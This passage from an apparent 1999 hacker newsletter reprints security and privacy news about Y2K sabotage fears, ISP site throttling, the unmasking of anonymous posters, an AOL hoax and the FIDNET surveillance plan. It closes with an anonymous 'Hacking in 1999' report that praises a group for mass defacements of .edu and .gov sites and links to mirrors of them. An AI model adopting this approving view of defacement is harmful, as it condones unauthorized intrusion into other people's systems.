  8309.      The data-protection directive took effect on Oct. 25,
  8310.      1998, and establishes a common regulatory framework
  8311.      for data transmission that aims to ensure both a high
  8312.      level of privacy for the individual and the free movement
  8313.      of personal data within the EU. Provisions also limit the
  8314.      transfer of personal data to countries outside the EU that
  8315.      respect similar standards of data protection. 
  8316.  
  8317.      These provisions have led to more than two years of
  8318.      negotiations between the EU and the U.S. over whether
  8319.      the U.S. data-protection standards -- which depend
  8320.      largely on voluntary self-regulation -- meet the directive's
  8321.      standards. These discussions are continuing, but the
  8322.      fact that nine of the 15 member states have not even
  8323.      complied with the directive has taken much of the
  8324.      urgency out of these trans-Atlantic talks. 
  8325.  
  8326.      To date only Greece, Portugal, Sweden, Italy, Belgium
  8327.      and Finland have fully implemented the directive. 
  8328.      
  8329.      @HWA
  8330.      
  8331.     
  8332. 60.0 EXPERTS WARN ABOUT NEW Y2K-THREAT
  8333.      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  8334.      
  8335.      From http://www.net-security.org/
  8336.  
  8337.      by Thejian, Thursday 29th July 1999 on 10:10 pm CET
  8338.      Two of the government's top computer security experts said today at a hearing on
  8339.      Y2K and cyberterrorism before a US Senate Committee that some programmers
  8340.      hired to fix Year 2000 problems may be quietly installing malicious software codes to
  8341.      sabotage companies or gain access to sensitive information after the new year. More.     
  8342.      
  8343.      http://dailynews.yahoo.com/headlines/ap/technology/story.html?s=v/ap/19990729/tc/y2k_threats_3.html
  8344.      
  8345.      Thursday July 29 12:22 PM ET 
  8346.  
  8347.      Experts Warn of New Y2K Threat
  8348.      
  8349.                      By TED BRIDIS Associated Press Writer 
  8350.      
  8351.                      WASHINGTON (AP) - Two of the government's top computer security experts said today that some programmers
  8352.      hired to fix Year 2000 problems may be quietly installing malicious software codes to sabotage companies or gain access to sensitive
  8353.      information after the new year.
  8354.      
  8355.      The alarms were sounded at a hearing on the ``Y2K glitch'' and cyberterrorism before the Senate Committee on the Year 2000 Technology Problem.
  8356.      
  8357.      ``Many of these (rogue programmers) have no security clearance, do not work for the government, and yet they have access to critical systems that if sabotaged
  8358.      could wreak havoc to our financial institutions and our economy,'' said Sen. Christopher Dodd, D-Conn., the committee's vice chairman.
  8359.      
  8360.      A recent analysis by the Gartner Group predicted electronic thefts worth at least $1 billion, noting that the computer networks of financial institutions, corporations
  8361.      and governments handle transactions worth $11 trillion annually.
  8362.      
  8363.      Michael Vatis, director of the FBI's National Infrastructure Protection Center, said experts hired by U.S. companies to fix their computers could secretly program
  8364.      ``trap doors'' - ways to let them gain access later - or add malicious codes, such as a logic bomb or time-delayed virus that could disrupt systems.
  8365.      
  8366.      ``While systems have been and will continue to be extensively tested, the probability of finding malicious code is extremely small,'' agreed Richard Schaeffer, director
  8367.      of the Defense Department's Infrastructure and Information Assurance program.
  8368.      
  8369.      Neither expert suggested the possible scope of the problem.
  8370.      
  8371.      Schaeffer said problems are complicated by the New Year's rollover, when some computers programmed to recognize only the last two digits of a year may mistake
  8372.      2000 for a full century earlier.
  8373.      
  8374.      ``It may be difficult to distinguish between a true Y2K event and some other anomaly caused by a perpetrator with malicious intent,'' Schaeffer said.
  8375.      
  8376.      Both experts said the risks were exacerbated by the amount of software repaired by companies overseas. Vatis called the situation ``a unique opportunity for foreign
  8377.      countries and companies to access, steal from or disrupt sensitive national and proprietary information systems.''
  8378.      
  8379.      Vatis recommended that companies thoroughly check the backgrounds of companies they hire for software repairs. He also said they should test for the existence of
  8380.      trap doors after the repairs, possibly even hiring teams to try to electronically crack into their own networks.
  8381.      
  8382.      The latest warnings come on the heels of new disclosures about White House plans to create a government-wide security network to protect the nation's most
  8383.      important computer systems from hackers, thieves, terrorists and hostile countries.
  8384.      
  8385.      The 148-page proposal from the Clinton administration describes building an elaborate network of electronic obstacles, monitors and analyzers to prevent and watch
  8386.      for potentially suspicious activity on federal computer systems.
  8387.      
  8388.      Sen. Robert Bennett, R-Utah, said today that the scope of the Y2K problem shows that a successful attack on a computer system - such as the network that
  8389.      controls the traffic lights or subway in New York - ``could have as much impact on the economy as if somebody actually dropped a bomb.''
  8390.      
  8391.      Civil liberties groups complain that the security tools also would make possible unprecedented electronic monitoring, especially because of the increasingly
  8392.      widespread use of computers by the government in almost every aspect of its citizens' daily lives.
  8393.      
  8394.      The White House defended the proposal.
  8395.      
  8396.      ``We are very concerned about protecting privacy rights,'' said Clinton's national security adviser, Sandy Berger. ``But there is also a privacy right in not having
  8397.      hostile entities attack systems. We're not only talking about 17-year-old kids in their basement. We're talking about governments that we know are developing
  8398.      systems to get access to our computer systems.''
  8399.      
  8400.      The first 500 intrusion monitors would be installed on nonmilitary government computers next year, according to a draft copy of the proposal obtained by The
  8401.      Associated Press. The full system would be completed by May 2003.
  8402.      
  8403.      The plan also suggests ways to convince private companies to monitor their corporate computer networks and share information about threats. But it said explicitly
  8404.      that the government will not force companies to permit federal monitoring of their systems.  
  8405.      
  8406.      @HWA
  8407.      
  8408. 61.0 WILL YOUR CABLE MODEM CENSOR THE WEB?
  8409.      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  8410.      
  8411.      From http://www.net-security.org/
  8412.  
  8413.      by Thejian, Thursday 29th July 1999 on 4:30 pm CET
  8414.      According to marketing materials from Cisco Systems cable companies can make
  8415.      use of certain features in Cisco products to behind the scenes slow down and limit
  8416.      access to selected Web sites. A Cisco spokesperson said the technology is
  8417.      available to phone companies, satellite firms and major Internet service providers to
  8418.      protect customers. Protect them from what? Offensive content or the competition of
  8419.      the provider? Read the whole article.      
  8420.      
  8421.      http://www.pcworld.com/pcwtoday/article/0,1510,12034,00.html
  8422.      
  8423.      From PC World Online
  8424.      Will Your Cable Modem Censor the Web? 
  8425.  
  8426.      Consumer groups balk at Cisco back-end equipment that can limit access to selected sites.
  8427.      
  8428.      by Reuters 
  8429.      July 29, 1999, 4:34 a.m. PT 
  8430.      
  8431.      A leading supplier of Internet gear for the cable industry is touting products to allow cable companies to block or restrict consumers from reaching any Web site they
  8432.      choose, drawing sharp criticism from public advocacy groups. 
  8433.      
  8434.      The revelations comes at a critical juncture for the industry, which is spending billions of dollars to roll out high-speed Internet service over cable lines while fighting national
  8435.      and local efforts to regulate their fledgling new product. 
  8436.      
  8437.      The industry has so far blunted the calls for regulation in all but two cities across the country, in part by committing to allow their customers to reach easily any Web site
  8438.      anywhere on the Internet, whether owned by a cable company or not. 
  8439.      
  8440.      Putting the Brakes on Rival Sites
  8441.      
  8442.      But according to marketing materials from Cisco Systems, the top maker of computer networking equipment, cable companies will be able to work behind the scenes with
  8443.      sophisticated software included in Cisco products to slow down and limit access to selected Web sites. 
  8444.      
  8445.      Without fully cutting off access to unaffiliated sites, the technology allows a cable company to make such destinations appear much more slowly on customers' computers
  8446.      than preferred sites, Cisco claimed in brochures distributed at a recent cable convention in Chicago. 
  8447.      
  8448.      Consumer Groups Call for Regulation
  8449.      
  8450.      "This is the owner's manual that they're providing to the cable industry to monopolize the Internet," said Jeff Chester, executive director of the Center for Media Education. 
  8451.      
  8452.      The non-profit Washington group, along with Consumers Union, the Consumer Federation of America and the Media Access Project, sent a letter Thursday to the Federal
  8453.      Communications Commission calling for regulation of cable Internet services. 
  8454.      
  8455.      The FCC has so far decided to monitor closely the cable Internet market of less than one million subscribers, compared with almost 40 million going online over ordinary
  8456.      phone lines. 
  8457.      
  8458.      The latest controversy appeared unlikely to change many minds at the agency. 
  8459.      
  8460.      "We share the same goals as the consumer groups and we believe that there should be an open system as well," said Debra Lathen, head of the agency's cable bureau.
  8461.      "Where we diverge is how you get there. We believe the market is going to mandate--to require--an open system." 
  8462.      
  8463.      "We will be very watchful; that is our obligation," Lathen added. 
  8464.      
  8465.      Thanks, But No Thanks
  8466.      
  8467.      AT&T, whose ExciteAtHome Internet provider has used some Cisco products, pledged not to use the features to discriminate against other Web sites. 
  8468.      
  8469.      "We are not in the content-management business; we're in the network management business," said spokesman Mark Siegel. 
  8470.      
  8471.      Asked if AT&T would utilize the Cisco products to limit access to any Web sites, Siegel replied: "No, we don't do that." 
  8472.      
  8473.      Cisco On the Defensive
  8474.      
  8475.      A Cisco spokesperson said the same technology was made available to all players, including phone companies, satellite firms and major Internet service providers. 
  8476.      
  8477.      "This is consistent with Cisco's open standards philosophy and commitment to competition in the marketplace," spokesman Tom Galvin said. "This technology was
  8478.      designed with customers in mind who clearly want tools to protect against offensive content such as hate or obscene material." 
  8479.      
  8480.      Cisco's marketing materials cited clearly commercial uses of the software, giving as an example a "push" Web site, which automatically downloads fresh news or other
  8481.      information to a customer's computer at set intervals. 
  8482.      
  8483.      "You could restrict the incoming push broadcasts as well as subscribers' outgoing access to the push information site to discourage its use," Cisco's brochure said. "At
  8484.      the same time, you could promote and offer your own partner's services with full-speed features to encourage adoption of your services while increasing network efficiency."
  8485.      
  8486.      Copyright ⌐ 1998 Reuters Limited 
  8487.      
  8488.      @HWA
  8489.      
  8490. 62.0 UNMASKING ANONYMOUS POSTERS
  8491.      ~~~~~~~~~~~~~~~~~~~~~~~~~~~ 
  8492.      From http://www.net-security.org/
  8493.  
  8494.      by Thejian, Thursday 29th July 1999 on 1:30 pm CET
  8495.      A new legal trend can be seen nowadays now attorneys more and more often use
  8496.      subpoenas to unmask the identities of anonymous posters to online discussion
  8497.      forums. Anyone can use that method in hopes of finding out the identity of an
  8498.      "anonymous" poster, it's a lot harder to defend yourself against it and then there are
  8499.      the other implications. Are certain groups trying to "chill" free speech? Read more
  8500.      about it here. 
  8501.      
  8502.      http://www.wired.com/news/news/politics/story/20983.html
  8503.      
  8504.      Unmasking Anonymous Posters
  8505.      Oscar S. Cisneros 
  8506.      
  8507.      3:00 a.m.  29.Jul.99.PDT
  8508.      A new legal trend has privacy advocates up in arms: Attorneys are using subpoenas to unmask the identities of anonymous posters to online
  8509.      discussion forums. And the people whose identities are at stake rarely have the chance to fight back. 
  8510.      
  8511.      Anonymous posters can seek to quash the subpoena and preserve their anonymity, said David Sobel, general counsel for the Electronic Privacy
  8512.      Information Center. But first, they have to have notice that the subpoena has been served. 
  8513.      
  8514.      
  8515.                                                      See also: Not-So-Privileged Info 
  8516.      
  8517.      
  8518.      Without notice, "there's no one in the picture that's ready to challenge the subpoena and bring it before a judge," he said. 
  8519.      
  8520.      Since subpoenas in civil lawsuits typically do not require a judge's stamp of approval, Sobel is concerned that individuals and companies are filing
  8521.      bogus lawsuits just to peel back the veil on a user's alias. 
  8522.      
  8523.      "Anyone can file a lawsuit," Sobel said. "You get a lawyer. You file a lawsuit against John Doe. And suddenly you have the authority to issue a
  8524.      subpoena." 
  8525.      
  8526.      Under their terms of service, many forum operators and ISPs promise not to divulge their users' personal information unless requested by a
  8527.      subpoena or court proceeding, Sobel said. But not all forum operators provide notice when a subpoena has been served. 
  8528.      
  8529.      Although it's not written into their terms of service agreements, both America Online and Microsoft's MSN let users know about pending subpoenas,
  8530.      Sobel said. "At least the subscriber has a fighting chance. At least they know what's going on." 
  8531.      
  8532.      Other forum operators -- notably Yahoo -- don't provide user notice. That's raised the ire of privacy advocates like Sobel and prompted users to
  8533.      erect a discussion group about the topic in one of Yahoo's forums. 
  8534.      
  8535.      "When people start to get the awareness that Yahoo is doing nothing to protect their privacy, that's going to start affecting their traffic," Sobel
  8536.      said. 
  8537.      Les French moderates a Yahoo discussion board for "Anonymous Yahoo message posters who are being sued." French started the forum after a
  8538.      former employer used a subpoena to reveal the identities behind his and other users' anonymous posts. 
  8539.      
  8540.      "They went down to court, filed a lawsuit, and subpoenaed Yahoo. They didn't send any notice to their users," French said. 
  8541.      
  8542.      "In my case, Yahoo provided them information which enabled [the company] to trace me back to Compuserve. And Compuserve, without notifying
  8543.      me, just turned over all the information in my account, including my credit card numbers. The only thing they didn't get was the password to my
  8544.      account." 
  8545.      
  8546.      Yahoo could not be reached for comment. But an attorney for the company who brought suit against French said that the company is well within
  8547.      its rights to unmask anonymous posters. 
  8548.      
  8549.      French and the other targets of the suit "essentially mixed fact with fiction" when describing the company online, said Stephan Pearson, assistant
  8550.      general counsel for Itex Corporation. Portland, Oregon-based Itex manages the records of bartering transactions between companies. 
  8551.      
  8552.      "We made the decision to unmask the identities of people who we thought were making defamatory statements about Itex Corporation," Pearson
  8553.      said. 
  8554.      
  8555.      French said that Itex has a different motivation: silencing criticism of the company's many business foibles. He said Itex has been beset by
  8556.      difficulties, including shifts in leadership, an ongoing Securities and Exchange Commission investigation, and being de-listed from the Nasdaq stock
  8557.      exchange for failing to file an annual report in 1998. 
  8558.      
  8559.      "I believe the reason Itex filed the suit was to chill speech -- free speech -- there on Yahoo's boards," French said, adding that financial discussion
  8560.      boards are one way to keep companies honest, and remind the board of directors that investors are watching their every action. 
  8561.      
  8562.      Pearson disagreed. 
  8563.      "Our action is a defamation-of-business kind of action and defamation has never been protected speech," he said. Some defendants named in the
  8564.      suit after they were unmasked were dropped from it when it was determined that their comments didn't harm the company in an illegal way, he
  8565.      added. 
  8566.      
  8567.      Regardless of the outcome of French and Itex's suit, privacy experts are worried the trend will only escalate without additional protections for
  8568.      consumers. 
  8569.      
  8570.      EPIC's Sobel drew into question not only Yahoo's practices, but TrustE's as well. TrustE awards seals to Web pages and companies who adhere to
  8571.      their strict privacy policy standards. 
  8572.      
  8573.      How can TrustE grant Yahoo a privacy seal when the company coughs up personal information without providing notice of a subpoena to users,
  8574.      Sobel asked. 
  8575.      
  8576.      "It's not part of our program to require that they do put the user on notice of a subpoena," said Paola Benassi, TrustE spokeswoman. "If it becomes
  8577.      an issue, we'll definitely see what makes the most sense." 
  8578.      
  8579.      Benassi defended Yahoo's privacy policy because she said it gives users notice that their information will be given out when Yahoo is served with a
  8580.      subpoena. She speculated that one cause for the lack of subpoena notice may be the volume of subpoenas, and the fact that many users are likely
  8581.      to set up accounts with false information. 
  8582.      
  8583.      Privacy advocates remain concerned. 
  8584.      
  8585.      "I think the word is rapidly spreading in the legal community that this is a great way to get information," said Sobel. "I think it is only matter of time
  8586.      before it becomes the norm in divorce cases -- the possibilities are endless." 
  8587.      
  8588.      @HWA
  8589.      
  8590. 63.0 AOL Y2KFIX: A HOAX DISGUISED AS A HOAX?
  8591.      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  8592.      
  8593.      From http://www.net-security.org/ 
  8594.  
  8595.      by Thejian, Wednesday 28th July 1999 on 11:50 pm CET
  8596.      A hoax disguised as a hoax warning is making its rounds around AOL users. It
  8597.      describes a fake "America Online Year 2000 Update" called Y2KFIX.EXE and
  8598.      allegedly fools users into giving up information on their accounts and credit cards.
  8599.      According to Symantic Y2KFIX.EXE doesn't match the characteristics of any known
  8600.      viruses. AOL also denies the existence of such an update. Story below
  8601.      
  8602.      --------------------------------------------------------------
  8603.      This story was printed from ZDNN,
  8604.      located at http://www.zdnet.com/zdnn.
  8605.      --------------------------------------------------------------
  8606.      
  8607.      AOL users hit by unusual hoax
  8608.      By Matthew Broersma, ZDNN
  8609.      July 27, 1999 3:44 PM PT
  8610.      URL: http://www.zdnet.com/zdnn/stories/news/0,4586,2303536,00.html
  8611.      
  8612.      A new hoax is making the rounds of AOL users, posing -- confusingly enough -- as a hoax
  8613.      warning. 
  8614.      
  8615.      The message, which seems to be sent by a concerned AOL (NYSE:AOL) user, describes a fake
  8616.      "America Online Year 2000 Update" called Y2KFIX.EXE. The fake message allegedly fools
  8617.      users into giving up information on their accounts and credit cards. But no such fake update exists.
  8618.      
  8619.      "There is currently no virus that has the characteristics ascribed to Y2KFIX.EXE," wrote Motoaki
  8620.      Yamamura of Symantec, in a briefing on Symantec's AntiVirus Research Center. "It is a sham,
  8621.      meant only to panic new or inexperienced computer users."
  8622.      
  8623.      Hoaxes thrive on the Internet like nowhere else, since it is so easy to pass along authentic-seeming
  8624.      messages without eliciting a closer examination. As outlined on the Department of Energy's
  8625.      "Internet Hoaxes" page, previous Internet frauds have involved everything from Blue Mountain
  8626.      Cards' greeting cards to a supposed tax on e-mail. 
  8627.      
  8628.      Message sounds real
  8629.      The Y2KFIX prank is especially perplexing because there are, in fact, many schemes designed to
  8630.      trick people into revealing their AOL passwords or other personal information. 
  8631.      
  8632.      "It sounds absolutely plausible," said AOL spokesman Rich D'Amato. 
  8633.      
  8634.      The "AOL Year 2000 Update" hoax e-mail even includes a copy of the scam
  8635.      message it is supposedly warning against. This begins, "Hello, I am Richard
  8636.      Brunner of the AOL TECH Team and we have recently finished work on this
  8637.      project which is the AOL Year 2000 Update." 
  8638.      
  8639.      This message is said to include an attachment called Y2KFIX.EXE, which,
  8640.      when executed, causes a fake AOL billing window to pop up, asking users
  8641.      for their names and credit card numbers, among other information. 
  8642.      
  8643.      "It looks very legit. It says your billing cycle was up and they need more info," the hoax e-mail
  8644.      warns. 
  8645.      
  8646.      Layers of deception
  8647.      AOL representatives say users can double-check the reality of scams at the service's
  8648.      "Neighborhood Watch" section. 
  8649.      
  8650.      "This is a rumor perpetuating a hoax pretending to be a virus," D'Amato commented. "Plato
  8651.      wouldn't even accept that as poetry." 
  8652.      
  8653.      The same trick e-mail also warms about a "flashing IM," or instant message, that will automatically
  8654.      steal your password unless you "sign off immediately." But AOL said that not only is the "flashing
  8655.      IM" a hoax, it isn't technically possible. 
  8656.      
  8657.      @HWA
  8658.      
  8659. 64.0 NO FBI SURVEILLANCE AFTER CRITICISMS
  8660.      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  8661.      
  8662.      From http://www.net-security.org/      
  8663.      
  8664.      by Thejian, Wednesday 28th July 1999 on 11:15 pm CET
  8665.      The US Government has decided to not to blindly go through with a plan to create two
  8666.      broad, FBI-controlled computer monitoring systems to protect the nation's key data
  8667.      networks. Critics were afraid that the plan could lead to a surveillance infrastructure
  8668.      with grave potential for misuse. Some inquiries are now first more at place. ZDNet. 
  8669.      
  8670.      --------------------------------------------------------------
  8671.      This story was printed from ZDNN,
  8672.      located at http://www.zdnet.com/zdnn.
  8673.      --------------------------------------------------------------
  8674.      
  8675.      U.S. backs off private monitoring
  8676.      By Maria Seminerio and Margaret Kane, ZDNN
  8677.      July 28, 1999 2:26 PM PT
  8678.      URL: 
  8679.      
  8680.      With criticism rolling in from all quarters, U.S. government officials on Wednesday backed away
  8681.      from a controversial plan to monitor private-sector networks for hacking activity. 
  8682.      
  8683.      The proposed Federal Intrusion Detection Network (FIDNET) plan, details of which were
  8684.      revealed by the New York Times Wednesday, has been in the works for at least a year, a
  8685.      National Security Council spokesman told ZDNN. The proposal for the government to monitor
  8686.      critical systems for security breaches arose out of concerns about the growing vulnerability of
  8687.      government computer networks and sensitive private-sector networks to hackers, the spokesman
  8688.      said. (The NSC advises the president on national security issues.) 
  8689.      
  8690.      But in spite of indications in a government document on the plan obtained by
  8691.      the Center for Democracy and Technology -- which indicates that private
  8692.      networks would also be watched -- the NSC spokesman denied that there is
  8693.      any plan for the surveillance of private online data. 
  8694.      
  8695.      The document outlining details of the plan says the FIDNET monitoring
  8696.      system would cover "critical government and ultimately private-sector
  8697.      information." Information gathered about network security breaches within
  8698.      one of the plan's three "pillars" -- the Department of Defense computer
  8699.      network, other federal networks and private sector networks -- "would also
  8700.      be shared with the other two pillars," according to the document. 
  8701.      
  8702.      The document coalesces with comments made by Jeffrey Hunker, senior
  8703.      director for critical infrastructure at the National Security Council, at the Black Hat Security
  8704.      Conference in Las Vegas earlier this month. "We depend on systems that were never meant to
  8705.      protect data from an organized threat," he told ZDNN. "The truth of the matter is that you all [the
  8706.      industry] own the systems that are going to be the target. It is not the federal government systems."
  8707.      
  8708.      However, in an interview with ZDNN, Jim Dempsey, senior staff counsel at CDT, said: "We feel
  8709.      the government should spend its resources closing the security holes that exist, rather than to
  8710.      watch people trying to break in," Jim Dempsey, senior staff counsel at CDT, said in an interview. 
  8711.      
  8712.      In spite of assurances from government officials that any monitoring would be largely automated,
  8713.      somewhere down the line a person would have to step into the process, Dempsey said -- and this
  8714.      is where such a system could be abused. 
  8715.      
  8716.      The government document detailing the plan acknowledges that "trained, experienced analysts" will
  8717.      have to step in to determine the nature of any suspected security breaches. 
  8718.      
  8719.      Looking for 'anomalous activities'
  8720.      But the NSC spokesman said the government does not plan to monitor private networks or read
  8721.      e-mail messages, but rather to "look for anomalous activities" such as evidence of denial of service
  8722.      attacks on military and other government networks. 
  8723.      
  8724.      This was little comfort to civil libertarians and other high-tech industry watchers, who blasted the
  8725.      plan as an Orwellian attack on privacy. 
  8726.      
  8727.      "I think this is a very frightening proposal," said Barry Steinhardt, associate director of the
  8728.      American Civil Liberties Union, in an interview. "The FBI has abused its power in the past to spy
  8729.      on political dissenters. This type of system is ripe for abuse," Steinhardt said. 
  8730.      
  8731.      "I think the threats (of network vulnerability) are completely overblown," said David Sobel,
  8732.      general counsel at the Electronic Privacy Information Center, in an interview. The perceived
  8733.      security threat is leading to "a Cold War mentality" that threatens ordinary citizens' privacy, Sobel
  8734.      said. 
  8735.      
  8736.      "The most serious concern about this is that it could move us closer to a surveillance society," said
  8737.      Ed Black, president of the Computer and Communications Industry Association, in an interview.
  8738.      "It's critical that if they do this, they should not retain any of the information that is gathered." 
  8739.      
  8740.      ZDNN's Robert Lemos contributed to this report.
  8741.      
  8742.      @HWA
  8743.      
  8744. 65.0 FEDS CRACK DOWN ON Y2K FRAUD
  8745.      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  8746.      
  8747.      From http://www.net-security.org/      
  8748.  
  8749.      by Thejian, Wednesday 28th July 1999 on 10:30 pm CET
  8750.      US regulators (read: Federal Trade Commision) yesterday took action against a
  8751.      Canada-based company that allegedly sold phony Y2K credit card protection against
  8752.      Y2K-related problems. This is said to be a first in a series of Y2K-fraud prevention by
  8753.      the FTC. The case was settled with $ 100.000 fine. Wired. 
  8754.      
  8755.      http://www.wired.com/news/news/business/story/20980.html
  8756.      
  8757.      Feds Crack Down on Y2K Fraud
  8758.      Wired News Report 
  8759.      
  8760.      8:10 a.m.  28.Jul.99.PDT
  8761.      US regulators took action Wednesday against a company that allegedly sold phony Y2K credit card protection packages through a large-scale
  8762.      telemarketing effort. 
  8763.      
  8764.      The Federal Trade Commission said the company, Canada-based NCCP Ltd., pretended to represent customers' credit card companies, and offered
  8765.      plans to cover theft of cards and special packages to protect against Y2K-related problems. However, the so-called packages contained only
  8766.      adhesive stickers, the FTC said. 
  8767.      
  8768.      FTC officials said Wednesday's action was its first enforcement measure concerning a Y2K-related fraud. 
  8769.      
  8770.      As part of an agreement with regulators, NCCP agreed to pay US$100,000 to settle charges that they falsely represented a credit card protection
  8771.      program. 
  8772.      
  8773.      --
  8774.      
  8775.      ETrade embraces UK: Online broker ETrade opened its fifth international enterprise Wednesday by launching an online investing Web site in the
  8776.      United Kingdom. 
  8777.      
  8778.      The company opened ETrade UK in partnership with Electronic Share Information. The joint venture is the first Internet-only broker to receive
  8779.      regulatory approval in the UK, the companies said in a statement. 
  8780.      
  8781.      The introductory rate for online transactions is ?.95 (about US$24). 
  8782.      
  8783.      ETrade said the new Web site is only a step in its plan to gird the globe with an electronic trading network. The company's first four sites outside
  8784.      the United States are in Canada, Australia, France, and Sweden. 
  8785.      
  8786.      @HWA
  8787.      
  8788. 66.0 RED HAT DELIVERS LINUX E-COMMERCE SERVER
  8789.      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  8790.      
  8791.      From http://www.net-security.org/       
  8792.  
  8793.      by dev, Wednesday 28th July 1999 on 10:10 pm CET
  8794.      Red Hat, a maker of Linux open source software, introduced an e-commerce server
  8795.      package Tuesday that's designed to move small businesses more quickly onto the
  8796.      Internet. The product combines Red Hat's Linux 6.0 and Apache Web server.
  8797.      Integrated into the e-commerce server is RSA Data Security's 128-bit encryption
  8798.      engine. Read more on the interesting combination of open source software and
  8799.      business solutions here.      
  8800.      
  8801.      Red Hat Delivers Linux E-Commerce Server
  8802.      By Eileen Colkin, InformationWeek
  8803.      Jul 27, 1999 (5:25 PM)
  8804.      URL: http://www.techweb.com/wire/story/TWB19990727S0026 
  8805.      
  8806.      Red Hat, a maker of Linux open source software, introduced an e-commerce server package Tuesday that's designed to move small businesses more quickly onto
  8807.      the Internet. The Red Hat Linux E-Commerce server combines Red Hat's Linux 6.0 open source operating system, which supports up to four processors with
  8808.      symmetric multiprocessing configuration, with the Apache Web open source server. Integrated into the e-commerce server is RSA Data Security's 128-bit
  8809.      encryption engine. 
  8810.      
  8811.      The server package includes Red Hat's Linux 6.0 applications CD, containing applications such as Star Division's StarOffice, which offers word processing,
  8812.      spreadsheet, graphic design, presentation, HTML editor, e-mail/news reader, event planner, formula editor, and other applications. The CD also features IBM's
  8813.      ViaVoice voice-recognition software and Applix's Applixware for Linux, a full-office suite including a developer bundle. 
  8814.      
  8815.      Also included in the server package is an e-commerce directory with offerings such as HP's WebQoS, which lets users prioritize Web server traffic based on
  8816.      business criteria, electronic shopping-cart software from MiniVend, and a credit card processing engine from CCVS. 
  8817.      
  8818.      As part of the Apache Web server, the Apache ASP module offers multiplatform development, while the Apache DAV module lets users edit, manage, and publish
  8819.      Web pages from the desktop without going through FTP. A Netscape Roaming Module lets the Apache server also act as a Netscape Roaming Access server. 
  8820.      
  8821.      Available immediately, the Red Hat Linux E-Commerce Server can be purchased on the Red Hat site or at retail sites for$149. Additional support packages are
  8822.      also available. 
  8823.      
  8824.      @HWA
  8825.      
  8826. 67.0 HACKING IN 1999 
  8827.      ~~~~~~~~~~~~~~~
  8828.      
  8829.      From http://www.net-security.org/       
  8830.      
  8831.      by BHZ, Monday 26th July 1999 on 4:42 pm CET
  8832.      Our new Special Report, written by anonymous, gives you a retrospective on the past
  8833.      year's underground happenings. "What is a hacker these days? Someone who uses a
  8834.      web browser to hack remote systems? Or is a hacker still defined as it was originally.
  8835.      Hacking is mostly about gaining access to a remote system, not showing off that you
  8836.      outsmarted an admin". You can read about security bugs, hack groups and incidents
  8837.      that marked 1999, in our Special Report entitled Hacking in 1999 | The Current State
  8838.      of Hacking.      
  8839.      
  8840.         
  8841.            Hacking in 1999 | The Current State of Hacking. 
  8842.      
  8843.                                      
  8844.      
  8845.       Major Exploits released in 1999
  8846.      
  8847.       In 1999, many things have happened, the allaire cold fusion bug has been widely
  8848.       advertised and put to use, many servers were compromised by using it, if
  8849.       you look to allot of the website defacement mirror sites, almost all were done
  8850.       by the cold fusion method. Yet another easy bug has been released in 1999
  8851.       by eEye Digital Security Team, this bug was for the Microsoft IIS server, and
  8852.       again many people have used this method to make a name for themselves.
  8853.       After looking at exploits like this, it makes you wonder what a hacker is these
  8854.       days? Someone who uses a web browser to hack remote systems? Or is a
  8855.       hacker still defined as it was originally. Hacking is mostly about gaining
  8856.       access to a remote system, not showing off that you outsmarted an admin.
  8857.      
  8858.        
  8859.      
  8860.       Major Incidents that have Affected the 'Scene'
  8861.      
  8862.       The first major incident the busting of Eric Burns AKA Zyklon. When companies
  8863.       pressed lawsuits against him for thousands of dollars because he broke into their
  8864.       servers.Up to now he is still not allowed to touch a computer I assume.
  8865.      
  8866.        
  8867.      
  8868.       The second incident was the raiding of members of the well known group gH a.k.a
  8869.       global Hell. An approximate 19 people were raided if not more, not only from
  8870.       gH but from other groups such as Level Seven, team spl0it, milw0rm and
  8871.       IL(Iron Lungs) from HcV/Legion2000 and forpaxe. 
  8872.      
  8873.        
  8874.      
  8875.       Kevin Mitnick was screwed around 2+ times, with them changing his court
  8876.       date around continuously and him now having to owe 1 mil.
  8877.      
  8878.       Read more about it at 2600, also support the FREE KEVIN movement.
  8879.      
  8880.        
  8881.      
  8882.       Just recently, a few incidents have happened as a result of John Veransevich
  8883.       otherwise known as JP from AntiOnline. First, Attrition makes a good
  8884.       accusation that JP indeed funded a hacker known as 'so1o' to deface the
  8885.       Senate Government website for him just to make a breaking news story
  8886.       (Although, I am not accusing him of doing this, because it was never
  8887.       proven). Another thing you notice about the "Anti Network" is the AntiCode
  8888.       website, which claims to be "the only place you need" for all of your
  8889.       exploits/network/security tools and utilities. But in reality this site is nothing
  8890.       more than an archive compiled from other known sites and the code ripped
  8891.       by AntiOnline it's self. Second MAJOR incident was when JP shut down a
  8892.       popular IRC server. And the third, probably most devastating to the
  8893.       underground community, was when JP caused Packetstorm Security to
  8894.       shut down, all of Ken Williams files were deleted forever, his work ruined.
  8895.       Not to mention many other things. You can read all those other things at : 
  8896.      
  8897.       http://www.attrition.org/negation/index2.html
  8898.      
  8899.        
  8900.      
  8901.       A few conventions have passed, such as Defcon, Defcon is probably the most
  8902.       recognized of all hacker conventions, this year some major things happened
  8903.       at this convention, they had a line-up of great speakers, Carolyn P. Meinel
  8904.       showed up and was not allowed in because she was accused of not being a
  8905.       'real' reporter (which I will not comment on), and shortly into the Defcon
  8906.       convention, their website was defaced by the very well know coding group
  8907.       known as ADM. Also Rootfest and the Blackhat Briefings have recently
  8908.       passed by.
  8909.      
  8910.        
  8911.      
  8912.       Who has showed up?
  8913.      
  8914.       Many new groups and individuals have showed up in 1999 up to now. To mention a
  8915.       few. and give a decent description of them and their actions + skills.
  8916.      
  8917.        
  8918.      
  8919.       Groups
  8920.      
  8921.       Forpaxe - Forpaxe showed up in early 99, they have been responsible for hitting a
  8922.       record number of .edu domains also quite a few .gov/.mil and numerous others. They
  8923.       are well known to all hackers and media. A member of the past groups Legion2000
  8924.       and HcV was a part of this group in the beginning, Iron Lungs, which later got raided
  8925.       by the FBI. Now it appears to just be 2 individuals (m1crochip/in0de) which they state
  8926.       on all of their webpage defacements. They do what they do for a reason, so they are
  8927.       a decent group of individuals as far as I am concerned.
  8928.      
  8929.       Mirrors of their Website Defacements
  8930.       http://www.attrition.org/mirror/attrition/forpax.html
  8931.      
  8932.        
  8933.      
  8934.       Goat Security - This organization is a definite mentionable, everybody knows and
